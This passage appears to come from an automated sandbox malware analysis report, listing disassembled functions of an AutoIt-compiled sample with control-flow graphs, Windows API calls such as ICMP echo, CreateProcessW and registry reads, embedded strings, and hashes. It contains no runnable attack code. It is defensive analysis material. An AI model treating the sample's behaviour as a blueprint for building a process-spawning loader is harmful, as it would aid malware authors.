                                                                                                          • Instruction Fuzzy Hash: 60215A71E05308AFEB20AFA5ED09B9D7BB4FB08311F00019AF504BA2A0D7B66554EF94
                                                                                                          Function 00EB5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 927 eb5e1d-eb5e54 call e44dc0 930 eb5e56-eb5e63 call e4502b 927->930 931 eb5e74-eb5e86 WSAStartup 927->931 930->931 938 eb5e65-eb5e70 call e4502b 930->938 933 eb5e88-eb5e98 call e97135 931->933 934 eb5e9d-eb5edb call e540cd call e44d37 call e5402a inet_addr gethostbyname 931->934 942 eb5ff6-eb5ffe 933->942 948 eb5edd-eb5eea IcmpCreateFile 934->948 949 eb5eec-eb5efc call e97135 934->949 938->931 948->949 950 eb5f01-eb5f32 call e60fe6 call e5433f 948->950 954 eb5fed-eb5ff1 call e51cb6 949->954 959 eb5f55-eb5f69 IcmpSendEcho 950->959 960 eb5f34-eb5f53 IcmpSendEcho 950->960 954->942 961 eb5f6d-eb5f6f 959->961 960->961 962 eb5fa2-eb5fa4 961->962 963 eb5f71-eb5f76 961->963 964 eb5fa6-eb5fb2 call e97135 962->964 965 eb5fba-eb5fcc call e44dc0 963->965 966 eb5f78-eb5f7d 963->966 976 eb5fd4-eb5fe8 IcmpCloseHandle WSACleanup call e545ae 964->976 977 eb5fce-eb5fd0 965->977 978 eb5fd2 965->978 969 eb5f7f-eb5f84 966->969 970 eb5fb4-eb5fb8 966->970 969->962 971 eb5f86-eb5f8b 969->971 970->964 974 eb5f9a-eb5fa0 971->974 975 eb5f8d-eb5f92 971->975 974->964 975->970 979 eb5f94-eb5f98 975->979 976->954 977->976 978->976 979->964
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00EB5E7E
                                                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00EB5EC3
                                                                                                          • gethostbyname.WS2_32(?), ref: 00EB5ECF
                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00EB5EDD
                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB5F4D
                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB5F63
                                                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EB5FD8
                                                                                                          • WSACleanup.WSOCK32 ref: 00EB5FDE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                          • String ID: Ping
                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                          • Opcode ID: a75eaacb3f0df96615d8b82082790a027be2a6ef40b845fc9b97ecaeac53ba31
                                                                                                          • Instruction ID: bbe28ae99d786de502483462531f6efb2fa70039a2b430087a4c9119b3f8ec7e
                                                                                                          • Opcode Fuzzy Hash: a75eaacb3f0df96615d8b82082790a027be2a6ef40b845fc9b97ecaeac53ba31
                                                                                                          • Instruction Fuzzy Hash: 2251AC326056019FD720EF25DC49BABB7E0EF48714F18592AF995BB2E1DB70E904CB42
                                                                                                          Function 00E54D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 981 e54d83-e54dd1 983 e54e31-e54e33 981->983 984 e54dd3-e54dd6 981->984 983->984 987 e54e35 983->987 985 e54e37 984->985 986 e54dd8-e54ddf 984->986 988 e54e3d-e54e40 985->988 989 e909c2-e909f0 call e4c460 call e4c483 985->989 990 e54de5-e54dea 986->990 991 e54ead-e54eb5 PostQuitMessage 986->991 992 e54e1a-e54e22 DefWindowProcW 987->992 993 e54e65-e54e8c SetTimer RegisterWindowMessageW 988->993 994 e54e42-e54e43 988->994 1028 e909f5-e909fc 989->1028 995 e54df0-e54df2 990->995 996 e90a35-e90a49 call ea2cce 990->996 999 e54e61-e54e63 991->999 998 e54e28-e54e2e 992->998 993->999 1002 e54e8e-e54e99 CreatePopupMenu 993->1002 1000 e90965-e90968 994->1000 1001 e54e49-e54e5c KillTimer call e55ac3 call e434e4 994->1001 1003 e54eb7-e54ec1 call e55b29 995->1003 1004 e54df8-e54dfd 995->1004 996->999 1021 e90a4f 996->1021 999->998 1007 e9096a-e9096c 1000->1007 1008 e9099e-e909bd MoveWindow 1000->1008 1001->999 1002->999 1023 e54ec6 1003->1023 1010 e90a1a-e90a21 1004->1010 1011 e54e03-e54e08 1004->1011 1015 e9098d-e90999 SetFocus 1007->1015 1016 e9096e-e90971 1007->1016 1008->999 1010->992 1018 e90a27-e90a30 call e98854 1010->1018 1019 e54e0e-e54e14 1011->1019 1020 e54e9b-e54eab call e55bd7 1011->1020 1015->999 1016->1019 1024 e90977-e90988 call e4c460 1016->1024 1018->992 1019->992 1019->1028 1020->999 1021->992 1023->999 1024->999 1028->992 1032 e90a02-e90a15 call e55ac3 call e559d3 1028->1032 1032->992
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00E54E22
                                                                                                          • KillTimer.USER32(?,00000001), ref: 00E54E4C
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E54E6F
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E54E7A
                                                                                                          • CreatePopupMenu.USER32 ref: 00E54E8E
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00E54EAF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: bfdddfafa436b3f694602fa818e00edbe0cdff6999a1d876c6c0d3bc9d110789
                                                                                                          • Instruction ID: 8e597d3fd223223b3057f250246e11dd4fa003d2b245f923cc4fe3092ab31888
                                                                                                          • Opcode Fuzzy Hash: bfdddfafa436b3f694602fa818e00edbe0cdff6999a1d876c6c0d3bc9d110789
                                                                                                          • Instruction Fuzzy Hash: 8841E8B1608309AFDF156F24AC0BBBA7795F74030AF143916FD01BA1D2CE61AC98A761
                                                                                                          Function 00E556F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E90C5B
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • _memset.LIBCMT ref: 00E55787
                                                                                                          • _wcscpy.LIBCMT ref: 00E557DB
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E557EB
                                                                                                          • __swprintf.LIBCMT ref: 00E90CD1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                                          • String ID: Line %d: $AutoIt - $H"H"
                                                                                                          • API String ID: 230667853-2139484885
                                                                                                          • Opcode ID: d0f0218eeceaf8bf4f5c4a76ad81866a36d12ce0f33c529890e6731740dc8938
                                                                                                          • Instruction ID: ba1f852fa1b2dbc7f9a0b5946de59dbfcbffe4c5aa7193b1085742f22566721b
                                                                                                          • Opcode Fuzzy Hash: d0f0218eeceaf8bf4f5c4a76ad81866a36d12ce0f33c529890e6731740dc8938
                                                                                                          • Instruction Fuzzy Hash: 6341B271408304AAC321EB60DC45BDFB7DCAF89355F101A5EF995B20A2EB30A64CCB92
                                                                                                          Function 00EBFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1172 ebfd7d-ebfdde call e63010 1175 ebfe0a-ebfe0e 1172->1175 1176 ebfde0-ebfdf3 call e4502b 1172->1176 1178 ebfe10-ebfe20 call e4502b 1175->1178 1179 ebfe55-ebfe5b 1175->1179 1184 ebfe40 1176->1184 1185 ebfdf5-ebfe08 call e4502b 1176->1185 1191 ebfe23-ebfe3c call e4502b 1178->1191 1181 ebfe5d-ebfe60 1179->1181 1182 ebfe70-ebfe76 1179->1182 1186 ebfe63-ebfe68 call e4502b 1181->1186 1187 ebfe78 1182->1187 1188 ebfe80-ebfe9a call e44d37 call e5436a 1182->1188 1192 ebfe43-ebfe47 1184->1192 1185->1191 1186->1182 1187->1188 1205 ebff59-ebff61 1188->1205 1206 ebfea0-ebfef9 call e44d37 call e5436a call e44d37 call e5436a call e44d37 call e5436a 1188->1206 1191->1179 1204 ebfe3e 1191->1204 1197 ebfe49-ebfe4f 1192->1197 1198 ebfe51-ebfe53 1192->1198 1197->1186 1198->1179 1198->1182 1204->1192 1208 ebff8b-ebffb9 GetCurrentDirectoryW call e60fe6 GetCurrentDirectoryW 1205->1208 1209 ebff63-ebff7e call e44d37 call e5436a 1205->1209 1251 ebfefb-ebff16 call e44d37 call e5436a 1206->1251 1252 ebff27-ebff57 GetSystemDirectoryW call e60fe6 GetSystemDirectoryW 1206->1252 1218 ebffbd 1208->1218 1209->1208 1222 ebff80-ebff89 call e62e2c 1209->1222 1221 ebffc1-ebffc5 1218->1221 1224 ebffc7-ebfff1 call e44f98 * 3 1221->1224 1225 ebfff6-ec0006 call ea6f95 1221->1225 1222->1208 1222->1225 1224->1225 1234 ec0008-ec0053 call ea7652 call ea7561 call ea75da 1225->1234 1235 ec0062 1225->1235 1239 ec0064-ec0068 1234->1239 1271 ec0055-ec0060 1234->1271 1235->1239 1243 ec006e-ec0099 call e98ef3 1239->1243 1244 ec0114-ec013b CreateProcessW 1239->1244 1256 ec009b-ec00a0 call e98f2e 1243->1256 1257 ec00a2 call e991cf 1243->1257 1249 ec013e-ec0151 call e6105c * 2 1244->1249 1275 ec0190-ec019c CloseHandle 1249->1275 1276 ec0153-ec018b call e97135 GetLastError call e5fdae call e44dc0 1249->1276 1251->1252 1277 ebff18-ebff21 call e62e2c 1251->1277 1252->1218 1270 ec00a7-ec00b9 call e62e2c 1256->1270 1257->1270 1285 ec00bb-ec00c0 1270->1285 1286 ec00c2-ec00d2 call e62e2c 1270->1286 1271->1239 1278 ec019e-ec01c3 call ea7205 call ea784d call ec025f 1275->1278 1279 ec01c8-ec01cc 1275->1279 1293 ec0211-ec0222 call ea702f 1276->1293 1277->1221 1277->1252 1278->1279 1287 ec01ce-ec01d8 1279->1287 1288 ec01da-ec01e4 1279->1288 1285->1285 1285->1286 1305 ec00db-ec00eb call e62e2c 1286->1305 1306 ec00d4-ec00d9 1286->1306 1287->1293 1294 ec01ec-ec020b call e44dc0 CloseHandle 1288->1294 1295 ec01e6 1288->1295 1294->1293 1295->1294 1311 ec00ed-ec00f2 1305->1311 1312 ec00f4-ec0112 call e6105c * 3 1305->1312 1306->1305 1306->1306 1311->1311 1311->1312 1312->1249
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EBFD9E
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF31
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF55
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF95
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFFB7
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC0133
                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EC0165
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EC0194
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EC020B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4090791747-0
                                                                                                          • Opcode ID: e1a20e96d358bab2b529d7856de7130e4f2cb639c87a590f2c660b011f355327
                                                                                                          • Instruction ID: ad73dfe7934eed066ad7a947766fc7030a2e44278fd4895a6f0bd5f4d4691258
                                                                                                          • Opcode Fuzzy Hash: e1a20e96d358bab2b529d7856de7130e4f2cb639c87a590f2c660b011f355327
                                                                                                          • Instruction Fuzzy Hash: 73E1AF31604301DFC715EF24D891B6ABBE1EF85314F18A86DF9856B2A2CB31EC45CB52
                                                                                                          Function 00E550DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1422 e550db-e5514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E55109
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E5512A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00E5513E
                                                                                                          • ShowWindow.USER32(00000000), ref: 00E55147
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: 5959b77440c652bfe196bf22236dd02c62b67b3a9b3c282712aed33647932117
                                                                                                          • Instruction ID: 48cb360824fe4b02667e39d8d9f19599a2c79da720ee6b04983a5daa600f4e90
                                                                                                          • Opcode Fuzzy Hash: 5959b77440c652bfe196bf22236dd02c62b67b3a9b3c282712aed33647932117
                                                                                                          • Instruction Fuzzy Hash: DFF0B7719453987EEB3127276C4DF277F7DE7C6F50F05015AB900A62A0C6612851EEB0
                                                                                                          Function 00EA9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1423 ea9b16-ea9b9b call e54a8c call ea9cf1 1428 ea9b9d 1423->1428 1429 ea9ba5-ea9c31 call e54ab2 * 4 call e54a8c call e6593c * 2 call e54ab2 1423->1429 1430 ea9b9f-ea9ba0 1428->1430 1447 ea9c36-ea9c5c call ea96c4 call ea8f0e 1429->1447 1432 ea9ce8-ea9cee 1430->1432 1452 ea9c5e-ea9c6e call e62f85 * 2 1447->1452 1453 ea9c73-ea9c77 1447->1453 1452->1430 1455 ea9cd8-ea9cde call e62f85 1453->1455 1456 ea9c79-ea9cd6 call ea90c1 call e62f85 1453->1456 1464 ea9ce0-ea9ce6 1455->1464 1456->1464 1464->1432
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E54A8C: _fseek.LIBCMT ref: 00E54AA4
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DE1
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DF4
                                                                                                          • _free.LIBCMT ref: 00EA9C5F
                                                                                                          • _free.LIBCMT ref: 00EA9C66
                                                                                                          • _free.LIBCMT ref: 00EA9CD1
                                                                                                            • Part of subcall function 00E62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62F99
                                                                                                            • Part of subcall function 00E62F85: GetLastError.KERNEL32(00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62FAB
                                                                                                          • _free.LIBCMT ref: 00EA9CD9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                          • API String ID: 1552873950-2806939583
                                                                                                          • Opcode ID: 57f5c105e41e44bfff08a74b86661ca52a3f9b6e216c0ffe76182bce80cc3aa8
                                                                                                          • Instruction ID: f67098223b2d7b05359c5675e367cb1b0a591de76f5173adf1d2c9f37a72fb7d
                                                                                                          • Opcode Fuzzy Hash: 57f5c105e41e44bfff08a74b86661ca52a3f9b6e216c0ffe76182bce80cc3aa8
                                                                                                          • Instruction Fuzzy Hash: EB515FB1A04219AFDF14DF64DC41A9EBBB9FF48314F00049EB609B7241EB715E848F58
                                                                                                          Function 00E6563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1559183368-0
                                                                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                          • Instruction ID: 79c5c4d0995f088b29397f54802a6f4dcc651ad8fbe7bf4c1d244fab290895db
                                                                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                          • Instruction Fuzzy Hash: 2F51C732B40B05DBDB248F69E8846AE77B5AF403A4F24972AF835B62D1D770AD50DB40
                                                                                                          Function 00E452B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4534A
                                                                                                          • TranslateMessage.USER32(?), ref: 00E45356
                                                                                                          • DispatchMessageW.USER32(?), ref: 00E45360
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1795658109-0
                                                                                                          • Opcode ID: acbb5a3ae8414be41473b4a8c6518355a322cec05538708cc4096ee21840ca00
                                                                                                          • Instruction ID: ec1ba299188337cf40baac44a9e2cd0088fea8bf94997edb2261d5e0ba31d25e
                                                                                                          • Opcode Fuzzy Hash: acbb5a3ae8414be41473b4a8c6518355a322cec05538708cc4096ee21840ca00
                                                                                                          • Instruction Fuzzy Hash: 7B313B31908709DBDB30DF64EC44BE977F8AB01748F24609AE422B71E6D3B5A845E711
                                                                                                          Function 00E41284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412A8
                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412C9
                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 3677997916-824357125
                                                                                                          • Opcode ID: 25c60cb48cb067ac00cb33653563b42205914e5ab30e4cf44bd9945f3bc2a124
                                                                                                          • Instruction ID: 2b9b275a82d94d7c21c4d89c816548beed872634417a6f4f3b5b7d6741fe6d06
                                                                                                          • Opcode Fuzzy Hash: 25c60cb48cb067ac00cb33653563b42205914e5ab30e4cf44bd9945f3bc2a124
                                                                                                          • Instruction Fuzzy Hash: 6F115A71515208BFDF208FA5EC84EEEBBB8EF05744F00559AF805E7120D2719E84A7A4
                                                                                                          Function 00E60FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E6593C: __FF_MSGBANNER.LIBCMT ref: 00E65953
                                                                                                            • Part of subcall function 00E6593C: __NMSG_WRITE.LIBCMT ref: 00E6595A
                                                                                                            • Part of subcall function 00E6593C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
                                                                                                          • std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                            • Part of subcall function 00E687CB: RaiseException.KERNEL32(?,?,?,00EFCAF8,?,?,?,?,?,00E61036,?,00EFCAF8,?,00000001), ref: 00E68820
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
